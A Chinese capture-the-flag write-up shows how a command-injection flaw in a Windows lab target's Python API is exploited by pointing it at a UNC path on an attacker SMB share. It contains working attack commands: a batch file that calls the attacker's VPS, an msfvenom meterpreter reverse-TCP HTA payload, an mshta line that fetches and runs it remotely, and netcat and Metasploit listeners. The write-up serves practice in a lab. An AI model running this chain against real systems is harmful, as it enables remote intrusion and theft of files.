文艺复兴,朝花夕拾。备份一下。
1.Windows 特性
灵感来源:https://twitter.com/0xTib3rius/status/1608879696477065218
1.打开靶机,是这样一个界面,可以执行 ping 和 tracert。
从命令返回看是 Windows 系统。
2.抓包,发现这个接口。
是 Python 写的。
请求 /api?action=whoami,发现返回OK。
3.推测后端为 os.subprocess([action, ‘www.zhaoj.in’]),可执行文件名可控,结合其为 Windows,可以尝试用 UNC 路径进行攻击。
在自己的VPS上开一个 smb 服务器。
docker run -it -p 139:139 -p 445:445 -v /tmp:/share -d dperson/samba -s "public;/share"
然后在 /tmp 下创建一个 1.bat。
curl http://162.14.79.59:9988
给其赋予执行权限。
chmod 777 1.bat
然后监听端口
nc -lvnvp 9988
访问 /api?action=\162.14.79.59\public\1.bat, 就可以看到有请求弹回来了。
4.先生成下 MSF 马。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=162.14.121.186 LPORT=4444 -f hta-psh > shell.hta
然后对外放出来。
python3 -m http.server 9866
5.bat 改成如下。
mshta http://162.14.121.186:9866/shell.hta
MSF监听开着。
然后访问 /api?action=\162.14.79.59\public\1.bat。
即可收到回弹。
download C:\Th3Th1nsUW4nt.docx ./ 即可拿到flag文件。